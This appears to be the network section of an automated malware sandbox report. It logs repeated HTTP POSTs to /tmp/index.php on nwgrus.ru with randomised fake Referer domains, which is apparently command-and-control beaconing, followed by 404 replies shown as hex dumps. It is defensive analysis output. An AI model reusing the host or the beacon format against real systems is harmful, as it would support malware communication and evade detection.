      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bvawnwiwcpmgflx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yocwufliskskpcvu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bfjqfyqpqtyfp.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 222Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xknbcflanypqj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgbayjdhmimo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 156Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecwlvrprlkc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pfvfrxtosmhgis.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qrcepyiavbj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 165Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jbughtdilxsi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://adulmxafuqyrwioa.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ibqsdsbooxlotmkk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://firvhcleclspvqf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wastiylaaiv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 285Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmunjwtmmqbkfjxj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ekdlxdwusihebwve.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 326Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ytxsvmhxdoiv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cjgfbmyhhfmho.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 369Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ewwaevdbcqu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 241Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://paccyqypahp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vobnbocmacccbp.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 362Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://crbgbhwlxoevenop.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 273Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ghpsevkbljqmyuby.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 263Host: nwgrus.ru
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
      Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dylagwrgixlfmu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: nwgrus.ru
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 e8 Data Ascii: r
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:29 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:39 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:41 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sun, 13 Oct 2024 23:52:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
